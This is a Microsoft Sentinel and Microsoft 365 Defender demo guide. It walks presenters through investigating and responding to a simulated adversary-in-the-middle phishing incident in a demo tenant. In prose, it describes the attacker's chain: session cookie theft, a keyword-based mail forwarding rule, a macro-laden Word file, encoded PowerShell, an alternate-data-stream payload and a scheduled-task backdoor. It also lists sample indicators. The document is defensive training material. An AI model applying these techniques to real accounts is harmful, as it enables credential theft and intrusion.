Microsoft Sentinel (SIEM) and

Microsoft 365 Defender (XDR)

Demo Guide

Updated: February 2023, Version 1.2

Check for updated versions here
This document is provided “as-is”. Information and views expressed in this document, including URL and other
Internet Web site references, may change without notice. You bear the risk of using it.

This document does not provide you with any legal rights to any intellectual property in any Microsoft product.
You may copy and use this document for your internal reference purposes.
Table of Contents
Table of Contents................................................................................................................................................... 2
What’s New............................................................................................................................................................ 3
Demo Instructions.................................................................................................................................................. 4
How to enable and access the XDR & Sentinel Demo............................................................................................................... 4
How to find relevant Demo scenarios.............................................................................................................................................. 4
How to use this demo............................................................................................................................................................................. 4
Microsoft 365 Defender (XDR) & Microsoft Sentinel Integration....................................................................5
Security Operations Demo Deep Dive.............................................................................................................................................. 6
Attack Story – AiTM Phishing........................................................................................................................................................... 6
Demo Delivery....................................................................................................................................................................................... 8
Step 1: Triage incident in Microsoft Sentinel............................................................................................................................... 9
Step 2: Investigate attack in Microsoft 365 Defender............................................................................................................ 12
Step 3: Complete investigation in Microsoft Sentinel............................................................................................................ 18
Step 4: Resolve incident in Microsoft Sentinel.......................................................................................................................... 23
Conclusion............................................................................................................................................................ 24

2
What’s New
February 2023 Update instructions to access the environment for MS employees
New attack story – AiTM Phishing
November 2022
Microsoft 365 Defender & Microsoft Sentinel SecOps demo

3
Demo Instructions
How to enable and access the XDR & Sentinel Demo
Tenant: ContosoHotels (seccxpninja.onmicrosoft.com)

Microsoft Internal: Using your Microsoft account, request access from https://aka.ms/M365dDemoAccess to
access the tenant using our B2B connection: This will allow you to access all the features of this demo. Once
your request has been automatically approved (within seconds), make sure you switch the Directory / Tenant
from Microsoft to contosohotels as shown on the screenshot below. If you don’t see it, Sign-out from the Azure
portal and login again. If you need our help, you can contact us at the bottom of this page.

Partners: Credentials will be provided through the CDX experience card. These credentials will change daily at
6:00 am UTC. To obtain the daily password to enable you to access the shared demo environment, please do
the following:

1. Open the Microsoft Sentinel & Microsoft 365 Defender (SIEM & XDR)
2. Enter and select a customer in the customer field
3. Click Add
4. Click Start
5. Accept the Terms of Use by checking the box and click Accept and Continue
6. Click on Launch after it appears and click Accept and Continue again
7. A new window containing login credentials will open on the right side of your screen

If you are logged in with credentials when the new daily password is generated, your session will not be
terminated. However, if your session times out after the password is changed, you will need to obtain the new
daily password to log in again.

How to find relevant Demo scenarios

This environment is a live environment shared by multiple Product Groups, teams and used by lots of people
like you to demonstrate our products capabilities, this results in lot of noise in the Incident list (impossible
travel, custom detections, etc.) that we try to lower as much as possible, but we don’t want to have a sanitized
environment either.

To help you to find a relevant demo, you can:

4
 - Use our demos guides (yes, one like this)
- Filter the incident list with Incident Tags like “SIEM&XDR Demo” “MDI Demo” “MDO Demo” “MDE Demo”
“M365D Demo” “MDA Demo”, etc. Note that each demo incident will be tagged with the product name and
the demo scenario it belongs to, example “MDO Demo” + “BEC” or “MDE Demo” + “Unmanaged”

We’ve given you rights to perform actions on the environment for you to have a more complete experience to
show to your customers, please revert any changes you made, and do not interfere with “DoNotTouch” entities.

How to use this demo

The demo is delivered through a demo tenant where simulated attacks are run so the demonstration can be
delivered many times with minimal effort. This is a dynamic demo environment that will change over time,
and you should visit the CDX Experience card at to check for updated demo scripts before each demo you
perform. This will ensure you have the latest demo guide and will not run into any problems during the
customer demo session.

5
Microsoft 365 Defender (XDR) & Microsoft Sentinel Integration
Microsoft Sentinel's Microsoft 365 Defender incident integration allows you to stream all Microsoft 365
Defender incidents into Microsoft Sentinel and keep them synchronized between both portals. Incidents from
Microsoft 365 Defender include all associated alerts, entities, and relevant information, providing you with
enough context to perform triage and preliminary investigation in Microsoft Sentinel. Once in Sentinel,
incidents will remain bi-directionally synced with Microsoft 365 Defender, allowing you to take advantage of
the benefits of both portals in your incident investigation. More information on M365 Defender integration
with Sentinel is available on this link: Microsoft 365 Defender integration with Microsoft Sentinel | Microsoft
Learn

This integration gives Microsoft 365 security incidents the visibility to be managed from within Microsoft
Sentinel, as part of the primary incident queue across the entire organization, so you can see – and correlate –
Microsoft 365 incidents together with those from all your other clouds, third party services or applications and
on-premises systems. At the same time, it allows you to take advantage of the unique strengths and
capabilities of Microsoft 365 Defender for in-depth investigations and a Microsoft 365-specific experience
across the Microsoft 365 ecosystem. Microsoft 365 Defender enriches, and groups alerts from multiple
Microsoft 365 products, both reducing the size of the SOC’s incident queue and shortening the time to resolve.
The component services that are part of the Microsoft 365 Defender stack are:

 Microsoft Defender for Endpoint (formerly Microsoft Defender ATP)

 Microsoft Defender for Identity (formerly Azure ATP)
 Microsoft Defender for Office 365 (formerly Office 365 ATP)
 Microsoft Defender for Cloud Apps (formerly Microsoft Cloud App Security)

Other services whose alerts are collected by Microsoft 365 Defender include:

 Microsoft Purview Data Loss Prevention (DLP) (Learn more)

 Azure Active Directory Identity Protection (AADIP) (Learn more)

6
Security Operations Demo Deep Dive
Attack Story – AiTM Phishing
This demo story is based on the AiTM (Adversary in The Middle) Phishing attack.
Find more about this attack in Microsoft Security Blog.

AiTM Phishing attack

Polly Watkins is working as a cloud architect in the Azure Infrastructure department, when she receives and
opens a spear phish email from someone who was impersonating a co-worker. She clicks on the link in the
email on Workstation 8, which redirects to attacker’s proxy that impersonates a Microsoft login page
(login.microsoftonline.com). After Polly enters her credentials and successfully authenticates via MFA, the
attacker obtains the session cookie (ESTSAUTH) and successfully authenticates to a session on the user’s behalf
to both the Office 365 & Azure Portal from a TOR IP Address. In the Office 365 portal, the attacker creates a
forwarding rule in Polly’s inbox to exfiltrate her email messages. In the Azure Portal, the attacker leverages
Polly’s privileged permissions for a specific resource group to create a new Azure storage container and
uploads a weaponized Microsoft Word document. The attacker generates a URL to the document with a
Shared Access Signature (SAS key and sends an internal phishing email to Karla Dickens, working in the Sales
Department. Karla receives and opens the email and clicks on the link to download the document on
Workstation 6. The document contains a malicious macro that executes a PowerShell script to create a
backdoor via the task scheduler.

7
Attack Steps
Steps Details
Phishing email sent (link is safe) to Dan and Polly
1
Link is weaponized
2 Polly clicks on the link
3 Polly’s ESTSAUTH Cookies stolen
4 Polly’s ESTSAUTH Cookies imported in session
5 The attacker creates an inbox forwarding rule in Polly’s email account in Office 365
The attacker creates a new container in an Azure Storage account in the Azure Portal
6
The attacker uploads a malicious file to the container, and generates an URL w/ SAS key
7 The attacker (as Polly) sends an internal phishing email to Karla including link to file
8 Karla clicks on the link, downloads file, and executes the payload
9 Backdoor created in endpoint via task scheduler

8
Demo Delivery
Log in to the Microsoft Sentinel portal with the following credentials

- Microsoft Internal: Microsoft Account (Switch directory to ContosoHotels)

- Partners: In an InPrivate browser session using the credentials found in the credential window.

After you have signed into the portal, you can stage the correct incident list view by performing the following
steps:

1. In the left navigation page, click Incidents

2. Filter the time range to Last 30 days
3. To search for the demo incident, you can filter as either below.
a. Search by Incident Name: SIEM&XDR
b. Search by Owner: SecurityDemoT1

9
Step 1: Triage incident in Microsoft Sentinel
In this demo we will conduct a blue team exercise, deep diving into every step taken in the AiTM phishing
attack, to fully narrate the attack story.

Important: Entity information highlighted (ex. URLs, email subject, Azure storage container name, IP Address) is
subject to change on every attack execution.

Demo Script Instructions

Microsoft Sentinel can integrate with Microsoft 365 Defender 1. Access to Microsoft Sentinel portal
in various ways. Note
 Synchronize Microsoft 365 Defender incidents, including Use the link above, as it enables necessary
all alerts and entities preview features
 Bi-directional sync on incidents status, owner, and closing 2. Click on Incidents, and find relevant
incident SIEM&XDR Demo <latest date>
reason
Multi-stage incident …
 Enrich Microsoft 365 Defender incidents with insights from
a. Search by Incident Name:
Microsoft Sentinel
SIEM&XDR Demo
 In-context deep link to facilitate investigations across both
or
portals b. Search by Owner: SecurityDemoT1
3. Click View full details in the bottom right
Let’s start our investigation in Microsoft Sentinel. corner of the page

From the incident page, search for the relevant Microsoft

365 Defender incident, and view the full details.

10
This incident is composed of all the Microsoft 365 Defender
stack, and the alerts cover all the MITRE categories.

Investigation insights
- Multistage targeted attack may have occurred

From the Entities list, we can see that Microsoft Azure is part
of this incident, which needs to be investigated.
4. Navigate to the Entities, scroll down to find
Top insights in the right pane provides great insights for Microsoft Azure but do not click
entities of an incident, including VIP information from
watchlist, IP reputation, anomalies seen for an account, etc. 5. In the Entities, search for adm_pwatkins and
navigate to the Top Insights on the right of
In the Activity Log, output results of the following the page
playbooks are included. 6. Expand the insights below
- Watchlist Insights (Preview) for
- IP reputation: Get virus total Ip reputation of all external Ips adm_pwatkins
associated to the incident, and the geo location of each IPs
Reputation is the IP's score calculated from the votes of the
VirusTotal's community.
- User Account Risk Details: Get risk details from the
IdentityInfo table of all users associated to the incident
- Threat Indicators related to user
- Endpoint Health Status: Get endpoint security configuration
status from Microsoft Defender for Vulnerability
Management of all devices associated to the incident

From the results, we understand that there are malicious IPs,

high risky users and misconfigured vulnerable devices
involved. 7. Click on Activity log on the top left (under
the Incident name “SIEM&XDR Demo mm-
At this point, the Tier-1 SOC analyst has found enough
dd-yy”)
evidence to conclude a true positive and escalates the incident
to Tier-2 for further investigation.

Investigation insights
- Misconfigured device: Workstation6 (Realtime Protection &
8. Navigate to the results of each playbook
Cloud Protection are turned OFF)
results
- VIP User: adm_pwatkins
a. Virus Total IP Reputation
*As polly has high privileges, added to the VIP watchlist
b. User Account Risk Details
- User at Risk
11
 - Karla: High risk, Confirmed Compromised c. Endpoint Health Status
- Polly (admin): Medium risk, At Risk
- Multiple malicious URLs / IPs are related to adm_pwatkins
- Multiple IP Address with Reputation under 0 in Virus Total >
malicious indication
- Microsoft Azure is part of the incident and needs to be
investigated

As there are high risks for user Polly and Karla, let’s take the
steps to block both user accounts in Azure AD.

Playbook: Block Compromised User (Entity Trigger)

Playbook SIEMXDR-Block-AzureADUser-Entity will block the
user in Azure Active Directory and output the result in the
Activity Log.
Note
- Playbook: “Incident Trigger” Important steps to execute
- Playbook will enable the user right after the execution for SIEMXDR-Block-AzureADUser-Entity
demo continuity 1. In Microsoft Sentinel incident page, find
user Polly Watkins (admin)
adm_pwatkins@seccxpninja.onmicrosoft.co
m under Entities
2. Click on the ellipsis icon next to the entity,
and click Run playbook

3. A right pane with the list of playbooks will

be shown. Search for playbook SIEMXDR -
Block-AzureADUser-Entity
4. Scroll to the very right, and click on Run to
execute the playbook
5. Close the “Run playbook on account”
6. Open Activity log on the top left (under
the Incident name “SIEM&XDR Demo mm-
dd-yy”), and point out the new comment
with the result of this playbook

12
Step 2: Investigate attack in Microsoft 365 Defender

Demo Script Instructions

Now that we understand the broad view of this 1. Click on the Investigate in Microsoft 365 Defender
incident and the risky entities in Sentinel, we will link on the left of the page
investigate in Microsoft 365 Defender portal to
understand more details.

You will land on the Attack story page of the

investigated incident in Microsoft 365 Defender
portal.

Let’s investigate the alert Suspicious URL

clicked.
2. From the attack story, click on Suspicious URL clicked
In the alert story, we can see that Polly (on alert
Workstation8) has opened outlook.exe, clicked
on the link that is categorized as MITRE
technique (T1204.001: Malicious Link) 3. Navigate to the alert story (bottom pane), and point out
This alert is related to another alert A the outlook.exe process details
potentially malicious URL click was detected.
In the details, we understand that there is an
email sent from an external user to Polly where it
had the exact same URL that was determined as 4. From the attack story, click on A potentially malicious
malicious. URL click was detected alert related to
pwatkins@seccxp.ninja
Investigation insights Attack Step
1
Polly received an email, and clicked on a
malicious link 5. Click on the Message list row (bottom pane, as in
screenshot below) to see the alert details (right pane)
Email Info
- Sender: SBeavers1@proton.me
- Recipient: pwatkins@seccxp.ninja
- Subject: New Azure Firewall
- URL:
http[:]//gbnplqxxxxxxxxxxx.companyportal.cloud/
*Highlighted entities are subject to change for every attack 6. Scroll down on the alert details and indicate the sender,
execution recipient, subject, and URL of this email

In the email entity page, we see that same email 7. Click on Open email entity from the alert details
was delivered to another user.

In the URL details, we see that the URL is

considered as a known phish verdict and 8. Click on URL tab, and the link associated to this email
redirects to a different URL. which will show more information
13
Screenshot of this URL shows that it is a
Microsoft login page, so we understand that
attacker had set up a reverse proxy.

In addition, alert Potential phishing web site

NOTE
indicates that the redirected URL is a potential
DO NOT access to this link, as it’s a phishing site
phishing web site.
9. Navigate to the url details on the right pane and point
out the verdict and verdict reason
Investigation insights Attack Step 2 10. Click on the link under Screenshots to see the
Confirmed that Polly has received a phishing screenshot of this URL.
email
URL Info
- http[:]//gbnplqxxxxxxxxxxx.companyportal.cloud/
- Verdict: Phish (MSTIC / ML)
- Redirects to https[:]//login.antoinetest.ovhxxxx
- Microsoft login page (reverse proxy)
- Potential phishing website
- 20.127.144.13

*Highlighted entities are subject to change for every attack

execution 11. Go back to the Incident page, and click on Evidence
and Response tab
Let’s also look at the automatic investigation 12. Indicate to the Emails, URLs blade point to the verdict
results of this incident. that both email & URL that we have investigated is
We can see that the email & URL analyzed is Malicious/Suspicious
considered as malicious/suspicious.

Investigation insights Attack Step 2

Confirmed that email received is malicious
- Sender: SBeavers1@proton.me
- Subject: New Azure Firewall
- URL:
http[:]//gbnplqxxxxxxxxxxx.companyportal.cloud/ 13. Got back to the Incident page (Attack Story)
*Highlighted entities are subject to change for every attack 14. Point out all the anomalous access alert including the
execution following.
a. Anonymous IP address
Going back to the attack story, after the b. Activity from infrequent country
suspicious link was clicked, there are many alerts c. Activity from a Tor IP address
from Azure AD Identity Protection & Microsoft 15. Pin all the alerts above
Defender for Cloud Apps. 16. Indicate that all the suspicious access is related to
- Anonymous IP address adm_pwatkins account
- Activity from infrequent country
- Activity from a Tor IP address

14
If you pin all the alerts above, you will see that
suspicious sign-ins coming from different IP are
related to adm_pwaktins account.

17. Click on Activity from a Tor IP address or Activity

from a password-spray associated IP address or
Activity from an anonymous proxy, related to the
Microsoft Exchange Online or Office 365 entity
When drilling down into the either alert below,
related to the Microsoft Exchange Online or
Office 365 entity, we can see the details of logon
activity of this user. 18. Click on the Activity Log on in the alert story (bottom
- Activity from a Tor IP address pane)
- Activity from a password-spray associated IP
address
- Activity from an anonymous proxy

19. Scroll down in the Event Details (right pane)

20. Point out the login details, that this user has logged on
successfully via MFA

From the details we have found out that Polly

has successfully authenticated via MFA from
suspicious IP Addresses.

Investigation insights Attack Step 3,4

Successful access from Tor (Anonymous) IP, 21. Click on Suspicious inbox forwarding rule alert,
using MFA to Azure Portal related to Exchange Online
Polly’s account is likely to be compromised
- MFA Status: MfaFromCredential
- UPN:
adm_pwatkins@seccxpninja.onmicrosoft.com 22. Click on activity (bottom pane) that starts with Create
- Application name: Exchange Online / Office 365 forwarding Inbox rule:
23. Click on View raw data in the Event details (right pane)
After access we can see that a forwarding rule to
send bank/credential related emails to external
user was created, which generated the alert 24. Point out the json file with forwarding rule details.
Suspicious inbox forwarding rule.
15
Investigation insights Attack Step 5
Email containing bank/credential info
forwarded to external user
- Rule name: itcleanup
- Subject or Body Contains: iban; secret;
password; transfer; bank; account
- forward to: lomelahimom@jollyfree.com
*Highlighted entities are subject to change for every attack
execution

There is another alert Activity from a Tor IP

address, related to the Microsoft Azure entity.
We can see that the attacker logged in to the
Azure Storage app, an conducted an operation
to list keys and write containers in a storage 25. Click on the ellipsis on the Microsoft Azure Icon, and
account name called contosohotelassets. click on Pin related alerts

Investigation insights Attack Step 6

Successful access from Tor IP, using MFA to
Azure Storage
26. On the list of alerts on the left, find the alert that was
- MFA Status: MfaFromCredential
pinned, and click on it to show the alert details.
- UPN:
*This can be any of the Microsoft Defender for Cloud
adm_pwatkins@seccxpninja.onmicrosoft.com
Apps alert.
- Application name: Microsoft_Azure_Storage
- Operation: ListKeys StorageAccounts
(contosohotelassets)
- IP Address 23.137.251.61 (password-spray
associated IP address)
*Highlighted entities are subject to change for every attack
execution

Later, we will investigate further in Microsoft 27. Click on any Log on Activity (bottom pane) and point
Sentinel what exactly happened in the Azure out the logon details (right pane) to see that MFA has
Storage account. been successful.

We have been investigating a lot into Polly’s

account as it is high likely to be compromised,

16
conducting malicious/suspicious activities in
Office 365 & Microsoft Azure environment.

When scrolling down into the Incident attack

story, we now see alerts related to new entities,
on workstation6.seccxp.ninja machine and
KDickens@seccxp.ninja account.
28. Click on Activity (bottom pane) that starts with ListKeys
Let’s drill down into the Suspicious URL clicked Storage Accounts:
29. Point out that ListKeys operation was successful on a
alert for this user and machine.
storage account contosohotelassets
Looking at the alert story, we can see that user
Karla Dickens (Account Manager in Sales) has
clicked on a link from an email (outlook.exe), 30. Scroll down on the Attack story, and click on Suspicious
which had downloaded a Word file. URL clicked alert related to device workstation6 and
This Word file executes a base64 encoded user KDickens
PowerShell script as a child process which then
downloads additional payloads to generate
suspicious activities on the machine. You can
scroll down into the alert story to see all the
31. Navigate to the alert story (bottom pane), and point out
related alerts, due to this PowerShell script. the outlook.exe process, and the URL contains the
Storage account contosohotelassets.
Investigation insights Attack Step 8
Karla received an email, and clicked on a
malicious link, downloads word file an
executes
32. Scroll down and point out that WINWORD.exe
- URL: https[:]//contosohotelsassets.blob.core. (Microsoft Word) is executed to open file call
windows.net/ generateAccountPlan.doc
automation/generateAccountPlan.doc
- Downloaded File: generateAccountPlan.doc
- Behavior: word document executes base64
encoded PowerShell script as child process

You can see that the Malicious Doc file creates a

persistence mechanism by downloading a binary
and hiding it into a NTFS Alternate Data Stream.
Remember, ADS are used in Windows to store
additional information about files like the Mark
of the Web, but attackers also use them to hide 33. Navigate to the second child process of Microsoft word
content. where it executes powershell.exe with a base64 encoded
command
This file is then launched at every startup and
right now using a scheduled task.

17
We can also see that this file is doing a network 34. Navigate then to the powershell.exe executed a script
connection to an IP that we have declared as AMSI data to clearly see the script content. Try to
malicious. highlight the fact that the script is downloading a
content that is then written to an Alternate Data Stream
named admin.exe of a file name itplaceholder.txt. And
that this file is then registered to launch with a
scheduled task at every startup and right now.
Looking into details of the related alert (either of
below)

- Email messages containing malicious URL

removed after delivery
- A potentially malicious URL click was
detected

we can see that this email came from an internal

compromised user adm_pwatkins (Polly).

Investigation insights Attack Step

7
Karla received an internal phishing email from 35. We can see the task running with the subsequent alerts
Polly
- Sender:
adm_pwatkins@secccxpninja.onmicrosoft.com
- Subject: Account plan automation
- URL:
https://contosohotelsassets.blob.core.windows.net/
automation/generateAccountPlan.doc?
sp=r&stxxxxx
- Threat: Malware / URL detonation reputation
*Highlighted entities are subject to change for every attack
execution

18
 36. Click on Email messages containing malicious URL
removed after delivery alert
37. Click on the message (bottom pane) to see the email
details (right pane)
Point out that this email is sent from user adm_pwatkins
to kdickens, and included a URL that user kdickens has
clicked to download and execute
(generateAccountPlan.doc).

19
Step 3: Complete investigation in Microsoft Sentinel

Demo Script Instructions

Now our investigation in Microsoft 365 Defender is done, let’s 1. Go back to Microsoft Sentinel incident
go back to Microsoft Sentinel to get more insights of this page
attack. SIEM&XDR Demo <latest date> Multi-
stage incident…
In the details of the relevant Microsoft 365 Defender incident, 2. Navigate to the Similar incidents section
we can see the list of similar incidents, which are defined by on the bottom of this page
incidents with similar entities. 3. Sort the incident by Last update time to
see the latest similar incidents
4. Scroll down and point out the similar
In the list of similar incidents, there are additional insights
incidents Sentinel has provided
provided by Microsoft Sentinel’s analytic rules for example…
- TI map IP entity to SigninLogs (Microsoft Sentinel)
- Azure Storage FileCreated Activity from suspicious proxy IP
address (Microsoft Sentinel)
- Azure Resource Manager operation from suspicious proxy IP
address (Microsoft Defender for Cloud) 5. Click on Incident Id (ex. 290410) of Azure
Storage FileCreated Activity from
suspicious proxy IP address
Let’s drill down to the alert Azure Storage FileCreated
Activity from suspicious proxy IP address.

Note
6. Point out to the Entities
If alert is not shown under “Similar Incidents”, search for
“adm_pwatkins” from the MAIN incident page (Azure portal >
7. Click on Investigate button on the
Microsoft Sentinel > CyberSecSOC > Incidents), and make sure to bottom left of this page to view the
select Entities as the scope for search. investigation graph

8. Click on generateAccountPlan.doc Icon,

and select Hosts where this file was
mentioned

This is a Microsoft Sentinel scheduled alert which was created

to enrich the storage file events for the alert Azure Resource
Manager operation from suspicious proxy IP address, which was
20
generated by Microsoft Defender for Cloud.

Under the related entities, you can see the entities we had
investigated in Microsoft 365 Defender including blob storage,
file, user account, and an IP Address.

In the investigation graph, once you expand the file to get

Hosts where this file was mentioned, we see that same file
exists in workstation6 (Karla’s machine), where we had
investigated into an internal phish > download word file > and
to generate suspicious PowerShell activities in Microsoft 365
Defender.
9. Go back to Microsoft Sentinel incident
page
SIEMXDR Demo <latest date> Multi-
stage incident…
10. Click on
adm_pwattkins@seccxpninja.onmicrosoft.
com under the Entities
11. On the right pane, click on Timeline, and
scroll down to find the alert name Azure
Now we understand that a compromised user had uploaded a Storage FileCreated Activity from
word file to Azure Blob Storage, accessing from a TOR IP. suspicious proxy IP address

Investigation insights Attack Step

6
Polly Watkins uploaded a malicious word file to Azure Blob
Storage accessing from a suspicious IP, which was later
downloaded by Karla Dickens to execute malicious activities. 12. Click on the button to add this alert to
- Azure Resource: /subscriptions/d1d8779d-38d7-4f06-91db- the Microsoft 365 Defender Incident
9cbc8de0176f/resourcegroups/simuland-assets/providers/ Note
microsoft.storage/storageaccounts/contosohotelsassets - You will not see the ‘+’ button once the
- Storage Account: Contosohotelasssets alert is already linked to the incident
- File: generateAccountPlan.doc
- Same file is seen in Workstation6
- IP: 23.137.251.61
*Highlighted entities are subject to change for every attack execution
Now we know that alert Azure Storage FileCreated Activity
from suspicious proxy IP address is related to the same
attack, let’s add this alert to the Microsoft 365 Defender
Incident.

13. Click on Tasks on the left top corner of

the incident page
Playbook
21
Now that we have investigated this attack, let’s run playbooks
to automatically take response actions to this incident focusing
on the Azure Storage FileCreated Activity from suspicious
proxy IP address alert.

In this incident, automatic tasks are created to navigate the

security admin to take necessary actions on the incident. In
each task’s description, it provides the name of the playbook
to execute, so let’s start taking response actions.

Note
Sentinel playbooks has 3 triggers, so make sure to run the playbook
from the correct place.
- Incident Trigger
- Alert Trigger
- Entity Trigger
Important steps to execute
1. Get User Confirmation on Incident (Alert Trigger) SIEMXDR-Request-UserConfirmation
First, we want to get user’s confirmation on whether this playbook
suspicious activity was conducted by the user or not.
Note 1. Add a new task with title as below and
Though we understand that adm_pwatkins account is compromised click save
from our investigation, we want to showcase the option of getting UserConfirm youralias
user confirmation on an alert. (ex. UserConfirm tamuto)

Playbook SIEMXDR-Request-UserConfirmation will send an

email notification to the end user and the manager, to get
acknowledgement for user’s activity. After the execution, it will 2. Close the task pane
complete the task, and create an Activity Log of the result. 3. Under the Incident timeline, find alert
Note Azure Storage FileCreated Activity
- Follow the steps correctly, or this playbook will fail from suspicious proxy IP address
- Playbook: “Alert Trigger”

This email is sending user confirmation to the affected user 4. Click on the ellipsis icon next to the alert,
Polly Watkins, her manager Dan Williams, and your email and click Run playbook
22
address. 5. A right pane with the list of playbooks
In the middle section, you can see the alert details including will be shown. Search for playbook
the entities. SIEMXDR-Request-UserConfirmation
On the very bottom, is where you can confirm on behalf of 6. Scroll to the very right, and click on Run
Polly whether it was her activity or not. to execute the playbook
7. An email will be sent out to your email
address (Account logged into the portal),
with details and options.
8. In the email, review the information and
click on No – this was not me button

After you submit your incident confirmation, it will update the

task as completed, with the comment in the task description.

Task

9. Go back to Microsoft Sentinel incident

page, and open the task that you have
Activity Log created. It will mark as completed, with
details in the description.
10. Open Activity log on the top left (under
the Incident name “SIEM&XDR Demo
mm-dd-yy”), and point out the new
comment with the result of this playbook

Important steps to execute

SIEMXDR-Block-IP-Entity-M365D
2. Block Suspicious IP in Microsoft 365 Defender (Entity Trigger)
1. In Microsoft Sentinel incident page, find
We have investigated that 20.127.144.13 is a phishing website,
IP Address 20.127.144.13 under Entities
so let’s blacklist the IP in Microsoft Defender for Endpoint 2. Click on the ellipsis icon next to the
23
Playbook SIEMXDR-Block-IP-Entity-M365D will add the entity, and click Run playbook
specified IP to the Microsoft Defender for Endpoint Indicator
and add the result to the Activity Log.

3. A right pane with the list of playbooks

will be shown. Search for playbook
Note
SIEMXDR-Block-IP-Entity-M365D
- Playbook: “Entity Trigger”
- Playbook will add IP Indicator as “Audit” for demo purposes 4. Scroll to the very right, and click on Run
to execute the playbook
5. Open Activity log on the top left (under
the Incident name “SIEM&XDR Demo
mm-dd-yy”), and point out the new
comment with the result of this playbook

Important steps to execute

SIEMXDR-Delete-FilefromBlobStorage-Alert
1. Under the Incident timeline, find alert
3. Delete-FilefromBlobStorage-Incident (Alert Trigger) Azure Storage FileCreated Activity
We understood that file generateAccountPlan.doc was from suspicious proxy IP address
identified as the initial malicious file to execute the backdoor 2. Click on the ellipsis icon next to the alert,
attack, so let’s delete the file from Azure Storage. and click Run playbook

Playbook SIEMXDR-Delete-FilefromBlobStorage-Alert will delete

the related file from the Azure Storage account associated to the 3. A right pane with the list of playbooks
incident and add the result to the Activity Log. will be shown. Search for playbook
SIEMXDR-Delete-FilefromBlobStorage-
Alert
4. Scroll to the very right, and click on Run
Note to execute the playbook
- Playbook: “Alert Trigger” 5. Open Activity log on the top left (under
- Playbook will delete the specified file from blob storage
the Incident name “SIEM&XDR Demo
- If already deleted, it will be shown in the Activity Log
mm-dd-yy”), and point out the new
comment with the result of this playbook

24
Step 4: Resolve incident in Microsoft Sentinel
Demo Script Instructions
After we have conducted all the necessary steps for this Note
incident, we can close this incident. - DO NOT conduct this step

Once Microsoft Sentinel’s incident is closed, it will sync the

incident status to Microsoft 365 Defender & Microsoft
Defender for Cloud.

25
Conclusion
In this demo, we have demonstrated the value of Microsoft 365 Defender, together with Microsoft Sentinel,
allowing security teams to effectively monitor and hunt for incidents in their environment and take action to
prevent attacks from recurring.

For more information about the integration of Microsoft Defender with Microsoft Sentinel and resources to
help you demonstrate the value to your customers, visit this link Microsoft 365 Defender integration with
Microsoft Sentinel | Microsoft Learn.

Additional resources available include:

Microsoft 365 Defender and Sentinel - Better together:

 An interactive guide to detect and respond to modern attacks with unified SIEM and XDR capabilities
 Microsoft 365 Defender integration with Microsoft Sentinel
 Join our Microsoft Security Community

Microsoft 365:

 An interactive guide to show how users can Protect their organization with Microsoft 365 Defender
 Security Resources for Microsoft 365 Defender including white papers and webinars
 Microsoft 365 Defender Blog and Tech Community

Microsoft Sentinel:

 Microsoft Sentinel Blog - Microsoft Community Hub

 Microsoft Sentinel skill-up training. From Zero to Hero in 21 modules
 Become a Microsoft Sentinel Ninja: The complete level 400 training

26